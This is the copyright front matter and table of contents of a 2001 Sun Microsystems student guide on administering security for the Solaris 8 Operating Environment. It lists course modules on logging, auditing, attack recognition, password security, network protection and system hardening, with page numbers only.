SC-300 Administering Security on the Solaris 8 Operating Environment

Sun Microsystems, Inc.UBRM05-104

500 Eldorado Blvd.Broomfield, CO 80021

U.S.A.

Revision C, August 2001

Administering Security on theSolaris™ 8 Operating

EnvironmentSC-300

StudentGuide

Please

Recycle

Copyright 2001 Sun Microsystems, Inc., 901 San Antonio Road, Palo Alto, California 94303, U.S.A. All rights reserved.

This product or document is protected by copyright and distributed under licenses restricting its use, copying, distribution, anddecompilation. No part of this product or document may be reproduced in any form by any means without prior written authorization ofSun and its licensors, if any.

Third-party software, including font technology, is copyrighted and licensed from Sun suppliers.

Parts of the product may be derived from Berkeley BSD systems, licensed from the University of California. UNIX is a registered trademarkin the U.S. and other countries, exclusively licensed through X/Open Company, Ltd.

Sun, Sun Microsystems, the Sun Logo, SunDocs, EJB, Enterprise JavaBeans, Forte Fusion, Java, Java 2 Platform, Enterprise Edition, Java APIfor XML Parsing, Java Authentication and Authorization Service, JavaBeans, Java Community Process, JavaMail, Java Message Service,JavaOne, JavaScript, Java Secure Socket Extension, JavaServer, JavaServer Pages, Java Virtual Machine, Java Web Server, J2EE, JDBC, JDK,JSP, JVM, Solaris, and SunNet Manager are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries.

All SPARC trademarks are used under license and are trademarks or registered trademarks of SPARC International, Inc. in the U.S. andother countries. Products bearing SPARC trademarks are based upon an architecture developed by Sun Microsystems, Inc.

Netscape is a trademark or registered trademark of Netscape Communications Corporation in the United States and other countries.

Netscape Navigator is a trademark or registered trademark of Netscape Communications Corporation in the United States and othercountries.

U.S. Government approval required when exporting the product.

RESTRICTED RIGHTS: Use, duplication, or disclosure by the U.S. Government is subject to restrictions of FAR 52.227-14(g) (2)(6/87) andFAR 52.227-19(6/87), or DFAR 252.227-7015 (b)(6/95) and DFAR 227.7202-3(a).

DOCUMENTATION IS PROVIDED “AS IS” AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS, ANDWARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE ORNON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLYINVALID.

Please

Recycle

Copyright 2001 Sun Microsystems Inc., 901 San Antonio Road, Palo Alto, California 94303, Etats-Unis. Tous droits réservés.

Ce produit ou document est protégé par un copyright et distribué avec des licences qui en restreignent l’utilisation, la copie, la distribution,et la décompilation. Aucune partie de ce produit ou document ne peut être reproduite sous aucune forme, par quelque moyen que ce soit,sans l’autorisation préalable et écrite de Sun et de ses bailleurs de licence, s’il y en a.

Le logiciel détenu par des tiers, et qui comprend la technologie relative aux polices de caractères, est protégé par un copyright et licenciépar des fournisseurs de Sun.

Des parties de ce produit pourront être dérivées du systèmes Berkeley 4.3 BSD licenciés par l’Université de Californie. UNIX est une marquedéposée aux Etats-Unis et dans d’autres pays et licenciée exclusivement par X/Open Company Ltd.

Sun, Sun Microsystems, the Sun Logo, SunDocs, EJB, Enterprise JavaBeans, Forte Fusion, Java, Java 2 Platform, Enterprise Edition, Java APIfor XML Parsing, Java Authentication and Authorization Service, JavaBeans, Java Community Process, JavaMail, Java Message Service,JavaOne, JavaScript, Java Secure Socket Extension, JavaServer, JavaServer Pages, Java Virtual Machine, Java Web Server, J2EE, JDBC, JDK,JSP, JVM, Solaris, et SunNet Manager sont des marques de fabrique ou des marques déposées de Sun Microsystems, Inc. aux Etats-Unis etdans d’autres pays.

Toutes les marques SPARC sont utilisées sous licence sont des marques de fabrique ou des marques déposées de SPARC International, Inc.aux Etats-Unis et dans d’autres pays.

Netscape est une marque de Netscape Communications Corporation aux Etats-Unis et dans d'autres pays.

Netscape Navigator est une marque de Netscape Communications Corporation aux Etats-Unis et dans d’autres pays.

Les produits portant les marques SPARC sont basés sur une architecture développée par Sun Microsystems, Inc.

LA DOCUMENTATION EST FOURNIE “EN L’ETAT” ET TOUTES AUTRES CONDITIONS, DECLARATIONS ET GARANTIESEXPRESSES OU TACITES SONT FORMELLEMENT EXCLUES, DANS LA MESURE AUTORISEE PAR LA LOI APPLICABLE, YCOMPRIS NOTAMMENT TOUTE GARANTIE IMPLICITE RELATIVE A LA QUALITE MARCHANDE, A L’APTITUDE A UNEUTILISATION PARTICULIERE OU A L’ABSENCE DE CONTREFAÇON.

vCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Table of Contents

About This Course .................................................................Preface-iCourse Goals............................................................................ Preface-iCourse Map..............................................................................Preface-iiModule-by-Module Overview .............................................Preface-iiiCourse Objectives...................................................................Preface-viTopics Not Covered..............................................................Preface-viiHow Prepared Are You?.................................................... Preface-viiiIntroductions .......................................................................... Preface-ixHow to Use Course Materials ............................................... Preface-xCourse Icons and Typographical Conventions ................. Preface-xi

Icons ................................................................................ Preface-xiTypographical Conventions .......................................Preface-xii

Security Overview ............................................................................1-1Objectives ........................................................................................... 1-1Relevance............................................................................................. 1-2Additional Resources ........................................................................ 1-3

Tool Downloads ........................................................................ 1-3Understanding Security ................................................................... 1-4

Security and UNIX®

................................................................. 1-5Examples of Break-Ins....................................................................... 1-8

Chronology of a Host Compromise ....................................... 1-8Western Union........................................................................... 1-9Nuclear Power Station............................................................ 1-10Travelocity ............................................................................... 1-10FTP Server ................................................................................ 1-10Yahoo! Web Server.................................................................. 1-11

Security Terminology ..................................................................... 1-12The Orange Book............................................................................. 1-14

Common Terms....................................................................... 1-16Types of Security Attacks .............................................................. 1-21

Fraud and Theft....................................................................... 1-21Terrorism and Sabotage ......................................................... 1-22Privacy Violation..................................................................... 1-22

vi Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Publicity Attacks ..................................................................... 1-23Denial of Service...................................................................... 1-24Natural Causes and Environmental Influences.................. 1-24

Frequency of Security Attacks ....................................................... 1-25Security Attacks Are Rare – Or Are They?.......................... 1-26

Understanding Your Attackers..................................................... 1-28Motivations of an Attacker .................................................... 1-30Other Types of Attackers ....................................................... 1-31Hackers ..................................................................................... 1-32Script Kiddies .......................................................................... 1-33Terrorists .................................................................................. 1-33Criminals .................................................................................. 1-33Employees ................................................................................ 1-34Top Enterprise-Wide Attacks................................................ 1-34

Running an Intrusion Detection System...................................... 1-36Burglar Alarms and Honey Pots........................................... 1-37Running Dummy Attacks...................................................... 1-38Vulnerability Scanners ........................................................... 1-38

Security Policy ................................................................................. 1-39Purpose and Use of a Security Policy .................................. 1-41Creating a Security Policy...................................................... 1-42

Using Third-Party Security Tools ................................................. 1-43Installation of Third-Party Tools .......................................... 1-44Security Issues With Third-Party Tools ............................... 1-46

Site Policy for Security Tools......................................................... 1-47Exercise: Considering Security Issues........................................... 1-49

Task – Example Security Attacks.......................................... 1-49Task – Security Policy............................................................. 1-49Task – System Configuration ................................................ 1-50

Exercise Summary............................................................................ 1-54Exercise Solutions ............................................................................ 1-55

Example Security Attacks ...................................................... 1-55Security Policy ......................................................................... 1-55System Configuration............................................................. 1-55

Using Solaris™ OE Log Files ......................................................... 2-1Objectives ........................................................................................... 2-1Relevance............................................................................................. 2-2Additional Resources ........................................................................ 2-3

Tool Downloads ........................................................................ 2-3Solaris OE Logging Files ................................................................... 2-4

Using /var/adm/lastlog Files.............................................. 2-5Using /var/adm/loginlog Files ........................................... 2-6Using utmpx and wtmpx Log Files .......................................... 2-6Using the sulog File ................................................................. 2-7Using /var/adm/messages Files ........................................... 2-7

viiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

The System Logging Facility ........................................................... 2-8Configuring the Syslog Utility ................................................ 2-9Why Use Centralized Logging? ............................................ 2-13The logger Utility .................................................................. 2-15Using the swatch Tool ........................................................... 2-16

Solaris OE Monitoring Tools .......................................................... 2-23Process Monitoring Using the top Tool ...................................... 2-25The Solaris OE Accounting Package ............................................ 2-27

Why Use the Accounting Package?...................................... 2-28Process Accounting................................................................. 2-29Working With the Accounting Package .............................. 2-30Setting Up Accounting ........................................................... 2-35

Exercise: Using Logging as a Security Tool ................................. 2-38Preparation............................................................................... 2-38Tasks ......................................................................................... 2-38Task – Sample sulog Commentary File .............................. 2-38Task – Studying Processes .................................................... 2-39Task – Enabling the Syslog Facility to Report su

Command Activity .............................................................. 2-40Task – Enabling the Syslog Facility to Report Failed

Login Activity....................................................................... 2-40Task – Enabling ftp to Report Logins ................................. 2-40Task – Using the swatch Tool............................................... 2-41Task – Starting Process Accounting ..................................... 2-43


Sample sulog Commentary File .......................................... 2-46Studying Processes ................................................................. 2-47Enabling the Syslog Facility to Report su Command

Activity .................................................................................. 2-48Enabling the Syslog Facility to Report Failed Login

Activity .................................................................................. 2-48Enabling ftp to Report Logins ............................................. 2-49Using the swatch Tool ........................................................... 2-49Starting Process Accounting.................................................. 2-49

The Solaris OE Basic Security Module...........................................3-1Objectives ........................................................................................... 3-1Relevance............................................................................................. 3-2Additional Resources ........................................................................ 3-3Solaris OE Basic Security Module Auditing ................................. 3-4

Identifying Major BSM Components ..................................... 3-6Enabling BSM .......................................................................... 3-11Disabling BSM ......................................................................... 3-13

viii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Creating an Audit Trail Using BSM ............................................. 3-14Setting Audit Flags ................................................................. 3-14Generating an Audit Trail...................................................... 3-22

Interpreting and Filtering Audit Data ......................................... 3-26Filtering Audit Data Using the auditreduce

Command.............................................................................. 3-26Formatting Audit Data Using the praudit

Command.............................................................................. 3-28Controlling the auditd Daemon Using the audit

Command.............................................................................. 3-29Implementing BSM Device Management.................................... 3-30

Configuring BSM Device Management ............................... 3-31Interpreting the /etc/security/device_maps File ........ 3-32Interpreting the /etc/security/device_allocate

File .......................................................................................... 3-34The Device-Clean Scripts ....................................................... 3-36Authorizing Users to Access Devices .................................. 3-37Device Allocation and De-Allocation .................................. 3-39Managing Devices Using BSM.............................................. 3-40

Exercise: Using the Basic Security Module .................................. 3-42Preparation............................................................................... 3-42Tasks ......................................................................................... 3-42Task – Installing and Configuring BSM............................... 3-42Task – Monitoring Audit Data .............................................. 3-43Task – Securing a Peripheral Device .................................... 3-44Task – Disabling BSM Auditing............................................ 3-46


Installing and Configuring BSM........................................... 3-48Monitoring Audit Data .......................................................... 3-48Securing a Peripheral Device ................................................ 3-48Disabling BSM Auditing ........................................................ 3-48

Security Attacks............................................................................... 4-1Objectives ........................................................................................... 4-1Relevance............................................................................................. 4-2Additional Resources ........................................................................ 4-3Recognizing Trojan Horses.............................................................. 4-4

Example Trojan Horses ............................................................ 4-5Identifying Back Doors................................................................... 4-12

Recognizing Common UNIX Back Doors ........................... 4-13Using Devices to Create a Back Door................................... 4-15

Detecting and Preventing Trojan Horse and Back DoorAttacks .............................................................................................. 4-18

The Solaris OE Fingerprint Database................................... 4-18TripWire ................................................................................... 4-19

ixCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Checklists, File Digests, and Checksums............................. 4-19The BSM Audit Trail............................................................... 4-19Using the find Command..................................................... 4-20Preventing Trojan Horse and Back Door Attacks .............. 4-22

Rootkits – Understanding How Attackers Use Them ............... 4-24Installing Back Doors and Trojan Horses ............................ 4-25Detecting Rootkit Use............................................................. 4-26Kernel Rootkits ........................................................................ 4-28

Identifying Denial of Service Attacks .......................................... 4-30Malicious DoS Attacks ........................................................... 4-31Preventing DoS Attacks ......................................................... 4-33Recognizing Causes of Accidental DoS ............................... 4-34

Exercise: Detecting Trojan Horses and Back Doors .................... 4-35Task – Detecting Trojan Horses and Back Doors ............... 4-35


Detecting Trojan Horses and Back Doors............................ 4-37

Administering User Accounts Securely .........................................5-1Objectives ........................................................................................... 5-1Relevance............................................................................................. 5-2Additional Resources ........................................................................ 5-3Administering Regular Users.......................................................... 5-4

Determining User and Group IDs .......................................... 5-4Implications of Duplicate User IDs ........................................ 5-5Selecting and Creating Groups and Group IDs (GIDs)....... 5-7Customizing Default Profiles .................................................. 5-8Setting Accounts to Expire..................................................... 5-11

Administering Superuser Accounts ............................................. 5-13Restricting Root Logins .......................................................... 5-14

Securing Guest Accounts ............................................................... 5-15Protecting Dormant Accounts....................................................... 5-17

Deleting Dormant Accounts.................................................. 5-19Checking User Security ................................................................... 5-21

Configuring the /etc/default/su File.............................. 5-21Classifying Non-Login Accounts.................................................. 5-22

Restricting Functionality Using a Non-Login Shell ........... 5-24Limiting User Options With Restricted Shells............................ 5-27

Assessing the Limitations Enforced by RestrictedShells ...................................................................................... 5-28

Configuring a Restricted Shell .............................................. 5-29

x Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Exercise: Securing Guest and Restricted Accounts ..................... 5-36Preparation............................................................................... 5-36Tasks ......................................................................................... 5-36Task – Creating a Guest Account With Automatic

Expiration.............................................................................. 5-36Task – Configuring a Restricted User Account .................. 5-37


Creating a Guest Account With AutomaticExpiration.............................................................................. 5-39

Configuring a Restricted User Account............................... 5-39

Password Security........................................................................... 6-1Objectives ........................................................................................... 6-1Relevance............................................................................................. 6-2Additional Resources ........................................................................ 6-3Passwords ........................................................................................... 6-4

Revisiting the Password and Shadow Files .......................... 6-4The /etc/passwd File .............................................................. 6-5The /etc/shadow File .............................................................. 6-7Setting a Password Policy........................................................ 6-9Choosing Good Passwords.................................................... 6-11Revisiting the passwd Command ......................................... 6-15Configuring Password Aging ............................................... 6-16Configuring Default Password Aging ................................. 6-18Checking for Accounts With No Password ........................ 6-19Using Password Generators .................................................. 6-21One-Time Passwords.............................................................. 6-23

Cracking Password Programs....................................................... 6-25Cracking Passwords Using the crack Tool ................................. 6-26

Using the crack Tool to Find Weak Passwords................ 6-27Installing and Running the crack Tool.............................. 6-28

Tools for Setting Good Passwords ............................................... 6-29Exercise: Securing Passwords ........................................................ 6-30

Preparation............................................................................... 6-30Tasks ......................................................................................... 6-30Task – Installing and Configuring the crack Tool ............ 6-30Task – Running the crack Tool Against the System

Passwords ............................................................................. 6-31Task – Using the crack Tool to Check Favorite

Passwords ............................................................................. 6-32Exercise Summary............................................................................ 6-33

xiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Exercise Solutions ............................................................................ 6-34Installing and Configuring the crack Tool......................... 6-34Running the crack Tool Against the System

Passwords ............................................................................. 6-34Using the crack Tool to Check Favorite Passwords ......... 6-35

Securing Root Access .....................................................................7-1Objectives ........................................................................................... 7-1Relevance............................................................................................. 7-2Additional Resources ........................................................................ 7-3

Tool Downloads ........................................................................ 7-3Controlling Root Access................................................................... 7-4Solaris OE Role Based Access Control (RBAC) ............................ 7-5

Understanding RBAC Concepts ............................................. 7-6Configuring RBAC Profiles ..................................................... 7-8Adding RBAC Profiles ........................................................... 7-10Using RBAC Roles and Profiles ............................................ 7-11Assigning Roles and Profiles................................................. 7-15Assuming a Role ..................................................................... 7-17Evaluating RBAC .................................................................... 7-18

The sudo Utility............................................................................... 7-20Using the sudo Utility ............................................................ 7-21Introducing sudo Tickets ....................................................... 7-23Configuring the sudo Utility ................................................. 7-24The sudoers Format............................................................... 7-25Using Aliases ........................................................................... 7-27Using Defaults ......................................................................... 7-29Logging sudo Activity............................................................ 7-31Security Implications of Using the sudo Utility ................. 7-33Evaluating the sudo Utility ................................................... 7-35

Exercise: Controlling Root Access ................................................. 7-36Preparation............................................................................... 7-36Tasks ......................................................................................... 7-36Task – Installing and Configuring the sudo Utility ........... 7-36Task – Configuring RBAC ..................................................... 7-37


Installing and Configuring the sudo Utility ....................... 7-39Configuring RBAC.................................................................. 7-40

xii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

File System Attacks ......................................................................... 8-1Objectives ........................................................................................... 8-1Relevance............................................................................................. 8-2Additional Resources ........................................................................ 8-3Guidelines for Setting Up the root Partition ............................... 8-4

Preventing Users From Filling the /tmp File ........................ 8-5Using Temporary File Systems ............................................... 8-6Preventing DoS Due to Limited Swap Space........................ 8-8

Setting File System Permissions for Security ............................... 8-10Files Permissions ..................................................................... 8-11Directory Permissions ............................................................ 8-12Permission Categories ............................................................ 8-13Review File Permissions ........................................................ 8-15Implications of Lax Permissions ........................................... 8-17Preventing Lax Permissions Using the umask Setting....... 8-18Checking File Permissions..................................................... 8-19

Set-User-ID and Set-Group-ID Files............................................. 8-20Identifying and Changing SUID and SGID Bits ................. 8-22

Setting Sticky Bits and SGID on Directories................................. 8-24Using Sticky Directories......................................................... 8-25Setting SGID Directories ........................................................ 8-27

Securing Files Using Access Control Lists .................................. 8-29Using the getfacl and setfacl Commands .................... 8-31Deleting ACL Entries.............................................................. 8-37

Encrypting Data ............................................................................... 8-38The crypt Command............................................................. 8-39

Securing Device Files...................................................................... 8-41Unauthorized Device Files .................................................... 8-42

Guidelines for Protecting Systems Using Backups .................... 8-43Restoring Data ......................................................................... 8-47

Exercise: Securing File Systems...................................................... 8-48Preparation............................................................................... 8-48Tasks ......................................................................................... 8-48Task – Creating ACLs............................................................. 8-48Task – Creating a Group-Shared Directory......................... 8-49Task – Creating File System Hardening Checklist............. 8-50


Creating ACLs ......................................................................... 8-52Creating a Group-Shared Directory ..................................... 8-54Creating a File System Hardening Checklist ...................... 8-57

Auditing File Systems ..................................................................... 9-1Objectives ........................................................................................... 9-1Relevance............................................................................................. 9-2Additional Resources ........................................................................ 9-3

xiiiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

What Is Auditing?............................................................................. 9-4Auditing Techniques ................................................................ 9-6Using Audits to Detect Successful Security Attacks............ 9-8File Digests and Checksums.................................................... 9-9Checksum Algorithms ........................................................... 9-10File Digest Algorithms ........................................................... 9-11The Solaris OE Fingerprint Database................................... 9-13

Using TripWire to Audit File Systems......................................... 9-15Obtaining the TripWire Tool................................................. 9-16Editing the TripWire Configuration File ............................. 9-17Configuration Templates ....................................................... 9-20Generating a TripWire Database .......................................... 9-21Checking a TripWire Database ............................................. 9-23Identifying Inconsistencies .................................................... 9-24Updating the Database........................................................... 9-25Double-Checking Integrity .................................................... 9-25

Securing the TripWire Database ................................................... 9-27Exercise: Using the TripWire Tool................................................. 9-29

Preparation............................................................................... 9-29Task – Installing TripWire ..................................................... 9-29Task – Creating a TripWire Configuration ......................... 9-30Task – Running System Integrity Checks............................ 9-31


Installing TripWire.................................................................. 9-34Creating a TripWire Configuration...................................... 9-36Running System Integrity Checks ........................................ 9-37

Attacking Network Data .................................................................10-1Objectives ......................................................................................... 10-1Relevance........................................................................................... 10-2Additional Resources ...................................................................... 10-3Network Sniffing............................................................................. 10-4

Implications of Sniffing.......................................................... 10-6How Sniffers Work ................................................................. 10-7Detecting Sniffers .................................................................... 10-8Defending Against Network Sniffers................................. 10-10

Network Sniffing Tools ................................................................ 10-11The snoop Utility .................................................................. 10-12The snoop Options................................................................ 10-14The snoop Packet Filters ...................................................... 10-17The dsniff Utility ................................................................ 10-20Running the dsniff Utility................................................. 10-21

Network Service Attacks.............................................................. 10-25Packet Replay Attacks .......................................................... 10-26Vulnerabilities of the sendmail Program ......................... 10-28

xiv Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Buffer Overflow Attacks ...................................................... 10-30Web (HTTP) Servers ............................................................. 10-32Network Denial of Service Attacks .................................... 10-33Types of Network Denial of Service Attacks .................... 10-35TCP SYN Flood Attack......................................................... 10-35Ping of Death Attack ............................................................ 10-38Smurf Attack.......................................................................... 10-39Smurf Countermeasures ...................................................... 10-41Recognizing Network Attacks ............................................ 10-42Port Scanning Using the nmap Utility ................................ 10-43Host Information From the nmap Utility ........................... 10-45

Exercise: Using Network Sniffing................................................ 10-47Preparation............................................................................. 10-47Tasks ....................................................................................... 10-47Task – Using the snoop Utility to Sniff Network

Traffic................................................................................... 10-47Task – Installing the dsniff Utility ................................... 10-48Task – Using the dsniff Utility ......................................... 10-48

Exercise Summary.......................................................................... 10-49Exercise Solutions .......................................................................... 10-50

Using the snoop Utility to Sniff Network Traffic............. 10-50Installing the dsniff Utility................................................ 10-50Using the dsniff Utility...................................................... 10-50

Securing Network Data.................................................................. 11-1Objectives ......................................................................................... 11-1Relevance........................................................................................... 11-2Additional Resources ...................................................................... 11-3Implementing Secure Communication Using SSL..................... 11-4

The Open SSL Project ............................................................. 11-5Defining the SSL............................................................................... 11-6

Properties of SSL ..................................................................... 11-7Simplifying SSL Using the stunnel Program .................... 11-8How Secure Is the SSL?........................................................ 11-10

Understanding the IP Security Architecture (IPsec)................ 11-12Configuring IPsec Security Associations........................... 11-13Adding IPsec Keys................................................................ 11-14Configuring IPsec Policies .................................................. 11-17Using the ipsecconf utility to Configure IPsec .............. 11-18Syntax for the IPsec Configuration File ............................. 11-20Rules for Parsing the Configuration File ........................... 11-23Example IPsec Configurations ............................................ 11-24Security Considerations With IPsec ................................... 11-26

xvCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Using the SunScreen™ SKIP Utility........................................... 11-27Configuring the SKIP Utility ............................................... 11-28Working With SKIP .............................................................. 11-30Using Clear Text.................................................................... 11-31

Exercise: Configuring and Using IPsec....................................... 11-32Preparation............................................................................. 11-32Tasks ....................................................................................... 11-32Task – Configuring IPsec ..................................................... 11-33Task – Configuring IPsec Encryption ................................ 11-33Task – Configuring IPsec Authentication.......................... 11-35Task – Authenticating All Hosts With IPsec..................... 11-36Task – Using IPsec AH and ESP With All Hosts.............. 11-36Task – Removing IPsec......................................................... 11-37


Configuring IPsec.................................................................. 11-39Configuring IPsec Encryption............................................. 11-40Configuring IPsec Authentication...................................... 11-40Authenticating All Hosts With IPsec ................................. 11-40Using IPsec AH and ESP With All Hosts .......................... 11-41Removing IPsec ..................................................................... 11-41

Analyzing Network Services..........................................................12-1Objectives ......................................................................................... 12-1Relevance........................................................................................... 12-2Additional Resources ...................................................................... 12-3

Tool Downloads ...................................................................... 12-3Applying SAINT to Improve Network Security ........................ 12-4

Assessing the Capabilities of SAINT.................................... 12-6Comparing SAINT and SATAN ........................................... 12-7

Installing and Using SAINT .......................................................... 12-8Understanding How SAINT Works................................... 12-10Using the SAINT Graphical User Interface....................... 12-12Defining SAINT Data Management................................... 12-14Setting SAINT Target Selection .......................................... 12-15Defining the Level of Attack ............................................... 12-16Allowing for Firewalls ......................................................... 12-17Running a SAINT Scan......................................................... 12-18

Configuring SAINT ....................................................................... 12-21Setting the Attack Level ....................................................... 12-22Configuring Probes by Attack Level.................................. 12-23Setting the Level of Password Guessing............................ 12-25Setting Time-Outs ................................................................. 12-27Determining Values for Proximity Variables.................... 12-28

xvi Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Interpreting SAINT Reports ......................................................... 12-31Reporting Vulnerabilities by Type ..................................... 12-31Reporting Potential Problems ............................................. 12-32

Detecting Network Analyzer Attacks........................................ 12-33Detecting Attacks Using Courtney..................................... 12-34Obtaining and Installing Courtney .................................... 12-35Using Courtney ..................................................................... 12-36

Exercise: Using SAINT and Courtney......................................... 12-37Preparation............................................................................. 12-37Task – Installing SAINT ....................................................... 12-37Task – Running a SAINT Attack......................................... 12-38Task – Running SAINT From the Command Line........... 12-38Task – Installing Courtney................................................... 12-38Task – Using Courtney to Detect Attacks.......................... 12-39


Installing SAINT ................................................................... 12-41Running a SAINT Attack ..................................................... 12-41Running SAINT From the Command Line....................... 12-42Installing Courtney ............................................................... 12-42Using Courtney to Detect Attacks ...................................... 12-42

Security Network Services............................................................ 13-1Objectives ......................................................................................... 13-1Relevance........................................................................................... 13-2Additional Resources ...................................................................... 13-3Restricting Network Services ........................................................ 13-4

FTP Users ................................................................................. 13-7Defending Network Services ........................................................ 13-8

Non-Standard Port Numbers ................................................ 13-9Dummy Services ..................................................................... 13-9

Berkeley r Commands ................................................................. 13-10Trusted Hosts ........................................................................ 13-12Determining Trusted Access ............................................... 13-15Trusted Hosts – Good or Bad? ............................................ 13-17

Securing Services With The chroot Command ....................... 13-19When to Use the chroot Command .................................. 13-20How to Use the chroot Command.................................... 13-20Anonymous FTP .................................................................. 13-22

Pluggable Authentication Module (PAM) ................................ 13-25PAM Runtime Modules ....................................................... 13-26PAM Configuration File....................................................... 13-29PAM Control Flags ............................................................... 13-31Deploying PAM .................................................................... 13-35Adding a PAM Module........................................................ 13-36Disabling Remote Access Using PAM ............................... 13-38

xviiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Initiating PAM Error Reporting.......................................... 13-40Sun Enterprise Authentication Mechanism (SEAM) ................ 13-42

Enhancing Security Using Kerberos v5 ............................. 13-42Logging in Using Kerberos v5 ............................................ 13-44Kerberos Features ................................................................. 13-45

Understanding Kerberos Limitations ........................................ 13-47Configuring SEAM Clients.................................................. 13-49

Exercise: Securing Network Services .......................................... 13-51Preparation............................................................................. 13-51Tasks ....................................................................................... 13-51Task – Disabling Network Services.................................... 13-51Task – Understanding Trusted Hosts ................................ 13-52Task – Configuring Trusted Hosts ..................................... 13-53Task – Disabling Trusted Hosts .......................................... 13-53Task – Configuring Anonymous FTP ................................ 13-53


Disabling Network Services ................................................ 13-55Understanding Trusted Hosts............................................. 13-55Configuring Trusted Hosts.................................................. 13-56Disabling Trusted Hosts ...................................................... 13-57Configuring Anonymous FTP............................................. 13-57

Hardening the System....................................................................14-1Objectives ......................................................................................... 14-1Relevance........................................................................................... 14-2Additional Resources ...................................................................... 14-3System Hardening .......................................................................... 14-4

Commonly Available Hardening Tools............................... 14-5COPS ......................................................................................... 14-6Tiger .......................................................................................... 14-8Solaris Security Toolkit .......................................................... 14-9

Using Titan..................................................................................... 14-11Titan Design Goals................................................................ 14-12Using Titan Modules ............................................................ 14-13Configuring Titan ................................................................. 14-18Running Titan........................................................................ 14-19Creating a Titan Configuration........................................... 14-20Running a Single Module .................................................... 14-21Writing Your Own Titan Modules ..................................... 14-22Module Structure .................................................................. 14-23

Enhancing System Security Using ASET................................... 14-26Using ASET Security Levels ................................................ 14-27Running ASET Manually..................................................... 14-29Restoring the System ............................................................ 14-32Monitoring Task Status ........................................................ 14-32

xviii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Running ASET Periodically................................................. 14-33Interpreting ASET Reports .................................................. 14-35Confirming Security Improvements Using the aset

Command............................................................................ 14-36Interpreting and Configuring the tune.* Files................ 14-36

Exercise: Hardening the System .................................................. 14-39Preparation............................................................................. 14-39Tasks ....................................................................................... 14-39Task – Installing and Configuring Titan............................ 14-39Task – Using Titan to Report on Security Problems ........ 14-40Task – Creating and Running a Titan Configuration ...... 14-41Task – Running ASET Interactively ................................... 14-41Task – Configuring ASET Periodically .............................. 14-42


Installing and Configuring Titan ........................................ 14-44Using Titan to Report on Security Problems .................... 14-44Creating and Running a Titan Configuration................... 14-44Running ASET Interactively................................................ 14-46Configuring ASET Periodically .......................................... 14-48

Authenticating Network Services................................................. 15-1Objectives ......................................................................................... 15-1Relevance........................................................................................... 15-2Additional Resources ...................................................................... 15-3Understanding Network Authentication .................................... 15-4Using TCP Wrappers...................................................................... 15-6

Obtaining and Installing TCP Wrappers............................ 15-8Configuring TCP Wrappers ........................................................... 15-9

Installing Hidden TCP Wrappers....................................... 15-10Installing Visible TCP Wrappers ........................................ 15-11Checking TCP Wrappers’ Configuration .......................... 15-12

Configuring Client Access Logging ........................................... 15-14Configuring Host Access Control............................................... 15-16

Access File Format ................................................................ 15-17Using Banners With TCP Wrappers........................................... 15-19

Building Banner Files ........................................................... 15-21Customizing a Banner Message.......................................... 15-22

Using Banners Without TCP Wrappers..................................... 15-24Using TCP Wrappers to Spawn Commands ............................ 15-25Checking Host Access Configuration ........................................ 15-27Exercise: Authenticating Network Services ............................... 15-29

Preparation............................................................................. 15-29Tasks ....................................................................................... 15-29Task – Installing TCP Wrappers ......................................... 15-29Task – Enabling Logging for telnet Connections .......... 15-30

xixCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Task – Denying Access to Specific Hosts........................... 15-30Task – Configuring TCP Wrappers to Warn of Denied

telnet Access .................................................................... 15-30Task – Configuring TCP Wrappers to Deny Access

to All Hosts Except Those Specified................................ 15-30Task – Removing Host Access Control.............................. 15-31


Installing TCP Wrappers ..................................................... 15-33Enabling Logging for telnet Connections....................... 15-33Denying Access to Specific Hosts ....................................... 15-34Configuring TCP Wrappers to Warn of Denied

telnet Access .................................................................... 15-35Configuring TCP Wrappers to Deny Access to

All Hosts Except Those Specified .................................... 15-36Removing Host Access Control .......................................... 15-36

Securing Remote Access ..............................................................16-1Objectives ......................................................................................... 16-1Relevance........................................................................................... 16-2Additional Resources ...................................................................... 16-3Identifying the Benefits of the Secure Shell................................. 16-4

OpenSSH Tools........................................................................ 16-6Using Encryption and Compression.................................... 16-8Security Benefits of Server Authentication ......................... 16-9Client Authentication ........................................................... 16-11Forwarding TCP/IP Ports Using OpenSSH...................... 16-12Copying Files and Executing Commands ......................... 16-14Benefits of the Password Agent .......................................... 16-15

Configuring the OpenSSH Server............................................... 16-16Creating the Host Key .......................................................... 16-19Starting the Secure Shell Daemon....................................... 16-21Installing the Secure FTP Server ......................................... 16-22

